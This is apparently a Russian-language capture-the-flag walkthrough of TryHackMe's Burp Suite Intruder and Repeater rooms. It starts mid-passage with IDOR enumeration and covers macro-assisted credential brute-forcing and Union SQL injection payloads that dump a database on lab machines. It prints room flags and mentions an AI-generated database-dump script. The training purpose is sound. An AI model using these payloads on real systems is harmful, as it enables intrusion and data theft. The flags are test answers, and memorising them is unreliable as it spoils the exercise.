указываем что перебираем

в пайлоде указываем числа и ставим от 0 до 1000

Атака

Видим что нашлось 6 - 57 - 78 - мы про них знали, но появились новые 47 и 83

47

83 - итог идор уязвимость есть

12. Испытание «Дополнительная миля»

В этом дополнительном упражнении мы рассмотрим более сложный вариант атаки с подбором учетных данных, которую мы проводили ранее. Однако на этот раз были приняты дополнительные меры, чтобы усложнить перебор паролей. Если вы умеете использовать Burp Macros, вы можете попробовать выполнить это задание без приведенных ниже инструкций. В противном случае, давайте перейдем к пошаговому руководству.

Обработка запроса

Для начала перехватите запрос http://10.49.129.42/admin/login/и проанализируйте ответ. Вот пример ответа:

Пример ответа

HTTP/1.1 200 OK
Сервер: nginx/1.18.0 (Ubuntu)
Дата: пятница, 20 августа 2021 г., 22:31:16 по Гринвичу
Content-Type: text/html; charset=utf-8
Соединение: закрыто
Set-Cookie: session=eyJ0b2tlbklEIjoiMzUyNTQ5ZjgxZDRhOTM5YjVlMTNlMjIzNmI0ZDlkOGEifQ.YSA-mQ.ZaKKsUnNsIb47sjlyux_LN8Qst0 ; HttpOnly; Path=/
Разные: Печенье
Front-End-Https: on
Content-Length: 3922
---
<form method="POST">
    <div class="form-floating mb-3">
        <input class="form-control" type="text" name=username placeholder="Имя пользователя" required>
        <label for="username">Имя пользователя</label>
    </div>
    <div class="form-floating mb-3">
        <input class="form-control" type="password" name=password placeholder="Пароль" required>
        <label for="password">Пароль</label>
    </div>
    <input type="hidden" name="loginToken" value="84c6358bbf1bd8000b6b63ab1bd77c5e">
    <div class="d-grid"><button class="btn btn-warning btn-lg" type="submit">Войти!</button></div>
</form>

В этом ответе мы видим, что помимо полей имени пользователя и пароля, теперь установлен сессионный cookie, а также токен CSRF ( Cross-Site Request Forgery ) в форме в виде скрытого поля. Обновление страницы показывает, что и сессионный cookie, и loginToken изменяются при каждом запросе. Это означает, что при каждой попытке входа в систему нам необходимо извлекать действительные значения как для сессионного cookie, так и для loginToken.

Для этого мы будем использовать макросы Burp , чтобы определить повторяющийся набор действий (макрос), которые будут выполняться перед каждым запросом. Этот макрос будет извлекать уникальные значения для cookie сессии и loginToken, заменяя их в каждом последующем запросе нашей атаки.

Учебное пособие

1. Перейдите по ссылке http://10.49.129.42/admin/login/. Активируйте функцию «Перехват» в модуле «Прокси» и попробуйте войти в систему. Перехватите запрос и отправьте его в Intruder.

1. Настройте позиции так же, как мы это делали для подбора паролей для входа в службу поддержки методом перебора:
• Установите тип атаки на «Pitchfork».
• Очистите все предопределенные позиции и выберите только поля ввода имени пользователя и пароля. Наш макрос обработает оставшиеся две позиции.
2. Теперь перейдите на вкладку «Полезные нагрузки» и загрузите те же списки имен пользователей и паролей, которые мы использовали для атаки на вход в службу поддержки. До этого момента мы настраивали Intruder практически так же, как и при предыдущей атаке с использованием украденных учетных данных; вот здесь-то все и начинает усложняться.

1. После обработки параметров имени пользователя и пароля нам нужно найти способ получить постоянно меняющийся loginToken и cookie сессии. К сожалению, "рекурсивный grep" здесь не сработает из-за ответа перенаправления, поэтому мы не можем сделать это полностью в Intruder — нам потребуется создать макрос. Макросы позволяют нам многократно выполнять один и тот же набор действий. В данном случае мы просто хотим отправить GET-запрос на адрес /admin/login/.К счастью, настройка — довольно простой процесс. В этом процессе, сравнительно говоря, много этапов, поэтому на следующем GIF-изображении показан весь процесс:
• Перейдите на главную вкладку «Настройки» в правом верхнем углу Burp.

• Нажмите на категорию "Сессии".

• Прокрутите страницу вниз до раздела «Макросы» и нажмите кнопку «Добавить» .

• В появившемся меню отобразится история наших запросов. Если в списке еще нет GET-запроса http://10.49.129.42/admin/login/ , перейдите по этой ссылке в браузере, и вы увидите подходящий запрос в списке.

• Выбрав запрос, нажмите ОК .
• Наконец, дайте макросу подходящее имя, а затем снова нажмите кнопку ОК, чтобы завершить процесс.

1. Теперь, когда макрос определен, нам необходимо установить правила обработки сессий, которые определяют, как следует использовать макрос.
• Оставаясь в разделе «Сессии» основных настроек, прокрутите вверх до раздела «Правила обработки сессий» и выберите « Добавить новое правило».

• Откроется новое окно с двумя вкладками: «Подробности» и «Область применения». По умолчанию мы находимся на вкладке «Подробности».
• Введите соответствующее описание, затем перейдите на вкладку «Область применения».

• В разделе «Область применения инструментов» снимите флажки со всех полей, кроме «Нарушитель» — нам не нужно, чтобы это правило применялось где-либо еще.

• В разделе «Область действия URL» выберите «Использовать область действия набора инструментов»; это настроит макрос на работу только с сайтами, добавленными в глобальную область действия (как обсуждалось в разделе «Основы Burp »). Если вы не задали глобальную область действия, оставьте параметр «Использовать пользовательскую область действия» по умолчанию и добавьте http://10.49.129.42/в эту область действия.

1. Теперь нам нужно вернуться на вкладку «Подробности» и посмотреть раздел «Действия правила». В текущем виде этот макрос будет перезаписывать все параметры в наших запросах Intruder перед их отправкой; это замечательно, поскольку это означает, что токены авторизации и сессионные cookie будут добавлены непосредственно в наши запросы. Тем не менее, перед началом атаки следует ограничить круг обновляемых параметров и cookie:Следующий GIF-файл демонстрирует заключительный этап процесса:
• Нажмите кнопку «Добавить» — появится выпадающее меню со списком действий, которые можно добавить.
• Выберите пункт «Запустить макрос» из этого списка.

• В появившемся новом окне выберите макрос, который мы создали ранее.
• Выберите «Обновить только следующие параметры и заголовки», затем нажмите кнопку « Редактировать» рядом с полем ввода под переключателем.
• В текстовом поле «Введите новый элемент» введите «loginToken». Нажмите «Добавить» , затем «Закрыть» .
• Выберите «Обновить только следующие файлы cookie», затем нажмите соответствующую кнопку «Редактировать» .
• Введите "session" в текстовое поле "Введите новый элемент". Нажмите " Добавить" , затем "Закрыть" .

• Наконец, нажмите кнопку ОК , чтобы подтвердить действие.
1. Нажмите ОК , и готово!
2. Теперь у вас должен быть определен макрос, который будет подставлять токен CSRF и cookie сессии. Осталось только переключиться обратно на Intruder и начать атаку! Примечание: В ходе этой атаки на каждый запрос должен приходить ответ с кодом состояния 302. Если вы видите ошибки 403, значит, ваш макрос работает некорректно.
3. Как и в случае с атакой с использованием украденных учетных данных для входа в службу поддержки, коды ответов здесь одинаковы (302 Redirects). Снова отсортируйте ответы по длине, чтобы найти действительные учетные данные. Результаты будут не такими однозначными, как в прошлый раз – вы увидите довольно много ответов разной длины, однако ответ, указывающий на успешный вход в систему, все равно должен быть значительно короче.
4. Используйте найденные вами учетные данные для входа в систему (возможно, вам потребуется обновить страницу входа перед вводом учетных данных).

ну по итогу у меня не получилось, но выручил ИИ быстрый PoC всегда можно написать на коленке

Если кому то надо вот

13. Заключение

Поздравляем с завершением строительства комнаты Burp Suite Intruder!

К этому моменту у вас должно быть четкое понимание того, как эффективно использовать Intruder для автоматизации запросов и выполнения различных типов атак.

В следующем зале модуля мы рассмотрим некоторые другие модули Burp Suite !

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!

1. Введение

Добро пожаловать в комнату Burp Suite Repeater!

В этой комнате мы рассмотрим расширенные возможности фреймворка Burp Suite, сосредоточившись на модуле Burp Suite Repeater. Опираясь на базовые знания, полученные в комнате «Основы Burp» , мы углубимся в мощные функции инструмента Repeater. Вы узнаете, как обрабатывать и повторно отправлять перехваченные запросы, а также мы рассмотрим различные опции и функции, доступные в этом замечательном модуле. На протяжении всей комнаты мы будем приводить практические примеры, включая упражнение из реальной жизни, чтобы закрепить ваше понимание обсуждаемых концепций.

Если вы новичок в Burp Suite или еще не прошли базовый курс Burp Basics, мы рекомендуем сделать это перед продолжением. Базовый курс Burp Basics дает необходимые знания для этого курса и улучшит ваш опыт обучения.

Разверните целевую виртуальную машину, подключенную к этой задаче, нажав зеленую кнопку «Запустить машину» . Также запустите AttackBox, нажав синюю кнопку «Запустить AttackBox» в верхней части этого окна, если вы используете не свою собственную машину. Затем запустите Burp и следуйте инструкциям в следующих задачах.

2. Что такое ретранслятор?

Прежде чем использовать Burp Suite Repeater, давайте ознакомимся с его назначением и функционалом.

По сути, Burp Suite Repeater позволяет нам изменять и повторно отправлять перехваченные запросы на выбранный нами целевой адрес. Он позволяет нам брать запросы, перехваченные в Burp Proxy , и манипулировать ими, отправляя их многократно по мере необходимости. В качестве альтернативы мы можем вручную создавать запросы с нуля, аналогично использованию инструмента командной строки, такого как cURL.

Возможность редактировать и повторно отправлять запросы несколько раз делает Repeater незаменимым инструментом для ручного исследования и тестирования конечных точек. Он предоставляет удобный графический интерфейс для создания полезной нагрузки запросов и предлагает различные варианты отображения ответа, включая механизм рендеринга для графического представления.

Интерфейс ретранслятора состоит из шести основных разделов, как показано на приведенной ниже схеме с пояснениями:

1. Список запросов : Расположен в верхнем левом углу вкладки и отображает список запросов к ретранслятору. Можно обрабатывать несколько запросов одновременно, и каждый новый запрос, отправленный в ретранслятор, будет отображаться здесь.
2. Элементы управления запросами : Расположенные непосредственно под списком запросов, эти элементы управления позволяют отправлять запросы, отменять зависшие запросы и перемещаться по истории запросов.
3. Разделы «Запрос» и «Ответ» : Занимая большую часть интерфейса, этот раздел отображает запросы и ответы . В разделе «Запрос» можно отредактировать запрос, а затем переслать его, при этом соответствующий ответ будет отображен в разделе «Ответ».
4. Параметры компоновки : Расположенные в правом верхнем углу окна «Запрос/Ответ», эти параметры позволяют настроить компоновку окон «Запрос» и «Ответ». По умолчанию используется горизонтальная компоновка, но можно также выбрать вертикальную компоновку или объединить окна в отдельные вкладки.
5. Инспектор : Расположенный справа, Инспектор позволяет анализировать и изменять запросы более интуитивно понятным способом, чем при использовании стандартного редактора. Мы рассмотрим эту функцию в одном из последующих заданий.
6. Поле « Цель » расположено над инспектором и указывает IP-адрес или домен, на который отправляются запросы. Когда запросы в Repeater отправляются из других компонентов Burp Suite , это поле заполняется автоматически.

3. Основные правила использования

На данный момент нам известен интерфейс приложения, но как эффективно его использовать?

Хотя ручное создание запросов является одним из вариантов, чаще всего запрос перехватывается с помощью модуля Proxy , а затем передается в Repeater для дальнейшего редактирования и повторной отправки.

После того как запрос будет перехвачен модулем Proxy , мы можем отправить его в Repeater, щелкнув правой кнопкой мыши по запросу и выбрав «Отправить в Repeater» , или используя сочетание клавиш Ctrl + R.

Вернувшись к Repeater, мы видим, что наш перехваченный запрос теперь доступен в представлении Request:

Теперь в разделах «Цель» и «Инспектор» отображается соответствующая информация, хотя ответа пока нет. После нажатия кнопки «Отправить» быстро заполняется окно «Ответ»:

Если мы захотим изменить какой-либо аспект запроса, мы можем просто ввести текст в поле «Запрос» и снова нажать «Отправить» . Это действие соответствующим образом обновит поле «Ответ» справа. Например, изменение заголовка «Соединение » с «close» на «open» приведет к получению ответа с заголовком «Соединение» , содержащим значение «keep-alive»:

Кроме того, мы можем использовать кнопки истории, расположенные справа от кнопки «Отправить», для навигации по истории изменений, что позволяет нам перемещаться вперед или назад по мере необходимости.

4. Панель инструментов анализа сообщений

Repeater предоставляет нам различные варианты отображения запросов и ответов, от шестнадцатеричного вывода до полностью отрисованной страницы.

Чтобы ознакомиться с этими возможностями, можно обратиться к разделу, расположенному над полем для ответа, где доступны следующие четыре кнопки просмотра:

Нам предлагаются следующие варианты отображения:

1. Pretty : Это вариант по умолчанию, который берет исходный ответ и применяет к нему небольшие улучшения форматирования для повышения читаемости.
2. Raw : Этот параметр отображает неизмененный ответ, полученный непосредственно от сервера, без какого-либо дополнительного форматирования.
3. Шестнадцатеричный режим : Выбрав этот режим, мы можем просмотреть ответ в байтовом представлении, что особенно полезно при работе с бинарными файлами.
4. Рендеринг : Опция рендеринга позволяет визуализировать страницу так, как она будет выглядеть в веб-браузере. Хотя она не часто используется в Repeater, поскольку мы обычно фокусируемся на исходном коде, она все же представляет собой ценную функцию. В большинстве случаев достаточно опции Pretty . Однако полезно ознакомиться с использованием остальных трех опций.

Рядом с кнопками просмотра, справа, находится кнопка «Показать непечатаемые символы» ( \n). Эта функция позволяет отображать символы, которые могут быть невидимы при использовании параметров «Красивый» или «Необработанный» . Например, каждая строка в ответе обычно заканчивается символами \r\n, представляющими собой возврат каретки с последующей новой строкой. Эти символы играют важную роль в интерпретации HTTP- заголовков.

Хотя для большинства задач этот вариант не является обязательным, в определенных ситуациях он может оказаться полезным.

5. Инспектор

Инспектор — это дополнительная функция к представлениям запросов и ответов в модуле Repeater. Он также используется для получения визуально организованной разбивки запросов и ответов, а также для экспериментов, чтобы увидеть, как изменения, внесенные с помощью Инспектора более высокого уровня, влияют на эквивалентные исходные версии.

Инспектор можно использовать как в модуле Proxy , так и в модуле Repeater. В обоих случаях он расположен в правой части окна и отображает список компонентов запроса и ответа:

Среди этих компонентов обычно можно изменять разделы, относящиеся к запросу, что позволяет добавлять, редактировать и удалять элементы. Например, в разделе «Атрибуты запроса » можно изменять элементы, связанные с местоположением, методом и протоколом запроса. Это включает в себя изменение требуемого ресурса для получения данных, изменение метода HTTP с GET на другой вариант или переключение протокола с HTTP /1 на HTTP /2.

К другим разделам, доступным для просмотра и/или редактирования, относятся:

1. Параметры запроса: это данные, отправляемые на сервер через URL. Например, в GET-запросе, таком как `<URL>` https://admin.tryhackme.com/?redirect=false, параметр запроса ` redirect` имеет значение `false`.
2. Параметры тела запроса: Аналогично параметрам запроса, но специфичны для POST-запросов. Любые данные, отправленные в рамках POST-запроса, будут отображаться в этом разделе, что позволит нам изменить параметры перед повторной отправкой.
3. Запрос файлов cookie: В этом разделе представлен изменяемый список файлов cookie, отправляемых с каждым запросом.
4. Заголовки запроса: Они позволяют нам просматривать, получать доступ и изменять (включая добавление или удаление) любые заголовки, отправляемые с нашими запросами. Редактирование этих заголовков может быть полезным при изучении того, как веб-сервер реагирует на неожиданные заголовки.
5. Заголовки ответа: В этом разделе отображаются заголовки, возвращаемые сервером в ответ на наш запрос. Изменить их невозможно, поскольку мы не контролируем заголовки, возвращаемые сервером. Обратите внимание, что этот раздел становится видимым только после отправки запроса и получения ответа.

Хотя текстовое представление этих компонентов можно найти в представлениях «Запрос» и «Ответ», табличный формат Инспектора предоставляет удобный способ визуализации и взаимодействия с ними. Экспериментирование с добавлением, удалением и изменением заголовков в Инспекторе помогает понять, как изменяется соответствующая исходная версия в ответе.

6. Практический пример

Repeater особенно хорошо подходит для задач, требующих многократной отправки аналогичных запросов, как правило, с незначительными изменениями. Это особенно полезно для таких действий, как ручное тестирование на уязвимости SQL- инъекций (будет рассмотрено в следующем задании), попытки обойти фильтры брандмауэра веб-приложений или корректировка параметров при отправке формы.

Начнём с предельно простого примера: использование Repeater для изменения заголовков запроса, отправляемого целевому объекту.

Перехватите запрос http://10.49.156.244/в модуле Proxy и отправьте его в Repeater.

Отправьте запрос один раз из Repeater — в окне ответа вы должны увидеть исходный HTML-код запрошенной страницы.

Попробуйте просмотреть это в одном из других режимов отображения (например, в шестнадцатеричном).

С помощью инспектора (или вручную, если хотите) добавьте заголовок с именем FlagAuthorisedи установите для него значение True, как показано ниже:

Добавлен заголовок с флагом FlagAuthorised.

GET / HTTP/1.1
Host: 10.49.156.244
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
FlagAuthorised: True

Вопрос: Какой флаг вы получаете?

Ответ: THM{Yzg2MWI2ZDhlYzdlNGFiZTUzZTIzMzVi}

7. Испытание

В предыдущем задании мы продемонстрировали использование Repeater, добавив заголовок и отправив запрос. Это послужило наглядным примером использования Repeater. Теперь настало время для простого задания!

Для начала убедитесь, что перехват отключен в вашем модуле проксиhttp://10.49.156.244/products/ , и перейдите по ссылке . Затем попробуйте нажать на некоторые из ссылок « Посмотреть больше» .

Обратите внимание, что вас перенаправляет на числовой адрес (например, /products/3).

Цель состоит в том, чтобы проверить конечную точку, подтвердив существование числа, к которому вы хотите перейти, и убедившись, что это допустимое целое число. Однако следует учитывать, что может произойти, если эта конечная точка не будет должным образом проверена.

пробуем -1

флаг

8. Вызов «Преодолеть лишнюю милю»

Вызов «Преодолеть лишнюю милю»

Это задание предназначено для проверки ваших навыков в несколько более сложной, реальной ситуации с использованием Burp Repeater. Если вы обладаете опытом самостоятельного выполнения SQL- инъекции вручную, вы можете перейти к последнему вопросу и выполнить это задание вслепую. Однако, если вам потребуется помощь, ниже будет предоставлено подробное пошаговое руководство. ( ТАК И СДЕЛАЕМ)

Необходимые предварительные знания

Прежде чем приступить к выполнению этого задания, рекомендуется ознакомиться с принципами SQL- инъекций. Если вы еще этого не сделали, пожалуйста, посетите раздел, посвященный этой теме. Хотя будет предоставлено подробное пошаговое руководство, базовое понимание принципов SQL - инъекций окажется полезным для выполнения этого задания.

Цель испытания

В этом задании ваша задача — выявить и использовать уязвимость типа Union SQL Injection, присутствующую в параметре ID конечной /about/IDточки. Используя эту уязвимость, вы должны осуществить атаку для получения информации о генеральном директоре, хранящейся в базе данных.

Пошаговое руководство

Мы знаем, что существует уязвимость, и знаем, где она находится. Теперь нам просто нужно её использовать!

Начнём с перехвата запроса http://10.49.156.244/about/2в Burp Proxy. После перехвата запроса отправьте его в Repeater, используя команду `send` Ctrl + Rили щёлкнув правой кнопкой мыши и выбрав «Отправить в Repeater».

Теперь, когда наш запрос подготовлен, давайте подтвердим наличие уязвимости. Добавление одного апострофа ( ') обычно достаточно, чтобы сервер выдал ошибку при наличии простой SQL-инъекции, поэтому, используя Инспектор или отредактировав путь запроса вручную, добавьте апостроф после "2" в конце пути и отправьте запрос:

Запрос заголовков из нашего браузера

GET /about/2 ' HTTP/1.1
Хост: 10.49.156.244
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Соединение: закрыто
Запросы на обновление, небезопасные и некорректные: 1

Вы должны увидеть, что сервер отвечает ошибкой "500 Internal Server Error", что указывает на то, что мы успешно прервали выполнение запроса:

Заголовки ответа от сервера

HTTP/1.1 500 INTERNAL SERVER ERROR<
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Aug 2021 23:05:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 3101

Если мы проанализируем тело ответа сервера, то примерно на 40-й строке увидим нечто очень интересное. Сервер сообщает нам, какой запрос мы пытались выполнить:

Чрезмерно подробное сообщение об ошибке, отображающее запрос.

<h2>
    <code>Invalid statement: 
        <code>SELECT firstName, lastName, pfpLink, role, bio FROM people WHERE id = 2'</code>
    </code>
</h2>

Это крайне полезное сообщение об ошибке, которое сервер ни в коем случае не должен нам отправлять, но тот факт, что оно у нас есть, значительно упрощает нашу работу.

В сообщении содержится несколько важных сведений, которые окажутся бесценными при использовании этой уязвимости:

• Таблица базы данных, из которой мы выбираем данные, называется people.
• Запрос выбирает пять столбцов из таблицы: firstName, lastName, pfpLink, role, и bio. Мы можем предположить, где они будут расположены на странице, что будет полезно при выборе места для размещения наших запросов.

Имея эту информацию, мы можем пропустить этапы перечисления номеров столбцов запроса и имен таблиц.

Хотя нам удалось значительно сократить количество необходимых здесь перечислений, нам все еще нужно найти название целевого столбца.

Зная имя таблицы и количество строк, мы можем использовать объединенный запрос (UNION) для выбора имен столбцов таблицы peopleиз columnsтаблицы в information_schemaбазе данных по умолчанию.

Простой запрос для этого выглядит следующим образом:
/about/0 UNION ALL SELECT column_name,null,null,null,null FROM information_schema.columns WHERE table_name="people"

Это создает объединенный запрос и выбирает целевой столбец, а затем четыре столбца со значением NULL (чтобы избежать ошибки запроса). Обратите внимание, что мы также изменили ID, из которого выбираем данные, 2на 0. Установив ID на недопустимое число, мы гарантируем, что не получим ничего с помощью исходного (легитимного) запроса; это означает, что первая строка, возвращенная из базы данных, будет желаемым ответом от внедренного запроса.

Проанализировав полученный ответ, мы видим, что название первого столбца ( id) было вставлено в заголовок страницы:

Название столбца "id" в заголовке ответа

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Aug 2021 22:12:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Front-End-Https: on
Content-Length: 3360


<!DOCTYPE html>
<html lang=en>
    <head>
        <title>
            About | id None
        </title>
-----

Нам удалось успешно извлечь имя первого столбца из базы данных, но теперь возникла проблема. На странице отображается только первый совпадающий элемент — нам нужно увидеть все совпадающие элементы.

К счастью, мы можем использовать SQL-инъекцию для группировки результатов. Мы по-прежнему можем получать только один результат за раз, но, используя функцию group_concat() , мы можем объединить все имена столбцов в один результат:
/about/0 UNION ALL SELECT group_concat(column_name),null,null,null,null FROM information_schema.columns WHERE table_name="people"

Этот процесс показан ниже:

Мы успешно определили восемь столбцов в этой таблице: id, firstName, lastName, pfpLink, role, shortRole, bio, и notes.

Учитывая поставленную задачу, кажется вполне вероятным, что целевым столбцом будет notes.

Наконец, мы готовы извлечь флаг из этой базы данных — у нас есть вся необходимая информация:

• Название таблицы: people.
• Название целевого столбца: notes.
• Идентификатор генерального директора — 1; его можно найти, просто щелкнув по профилю Джеймсона Вулфа на /about/странице и проверив идентификатор в URL-адресе.

Давайте составим запрос для извлечения этого флага:
0 UNION ALL SELECT notes,null,null,null,null FROM people WHERE id = 1

И вуаля, у нас есть флаг!

ОТ сюда начнем крутить скулю

ставим ' в запросе. и получаем 500

Проанализировав ответ видим запрос к бд

пробуем посмотреть колонки

имя первого столбца из базы данных, но теперь возникла проблема. На странице отображается только первый совпадающий элемент — нам нужно увидеть все совпадающие элементы.

0 UNION ALL SELECT group_concat(column_name),null,null,null,null FROM information_schema.columns WHERE table_name="people"

Получили id,firstName,lastName,pfpLink,role,shortRole,bio,notes

Мы успешно определили восемь столбцов в этой таблице: id, firstName, lastName, pfpLink, role, shortRole, bio, и notes.

Учитывая поставленную задачу, кажется вполне вероятным, что целевым столбцом будет notes.

Наконец, мы готовы извлечь флаг из этой базы данных — у нас есть вся необходимая информация:

• Название таблицы: people.
• Название целевого столбца: notes.
• Идентификатор генерального директора — 1; его можно найти, просто щелкнув по профилю Джеймсона Вулфа на /about/странице и проверив идентификатор в URL-адресе.

Давайте составим запрос для извлечения этого флага:
0 UNION ALL SELECT notes,null,null,null,null FROM people WHERE id = 1

попробуем еще получить название бд и все содержимое

даем команду ИИ сделать нам скрипт который откроет нам всю бд

Получаем всю бд

Скрипт отработал отлично — вся БД извлечена. Вот краткая сводка:

База данных: site Таблица: people (8 колонок, 6 строк)

Флаг найден в колонке notes у CEO (id=1):

THM{ZGE3OTUyZGMyMzkwNjJmZjg3Mzk1NjJh}

Это запись Jameson Wolfe — Co-Founder & CEO, как и требовалось по заданию. У остальных сотрудников поле notes пустое.

9. Заключение

Поздравляем с завершением обустройства комнаты Burp Suite Repeater!

К этому моменту у вас должно быть четкое понимание того, как эффективно использовать Repeater для редактирования, обработки и повторной отправки запросов. Кроме того, вы должны были получить представление о многочисленных практических применениях этого инструмента.

В следующем зале модуля мы рассмотрим модуль Burp Suite Intruder. Intruder позволяет проводить автоматизированные и настраиваемые атаки, что делает его мощным инструментом для различных сценариев тестирования безопасности.

Удачи в следующей комнате и приятного изучения возможностей Burp Suite Intruder !

Основная группа обучения ИБ
Lab-группу с полезным софтом / книгами / аудио.
Чат для обсуждений, задавай свои вопросы.
P.S. С вами был @Fnay_Offensive
До новой встречи, user_name!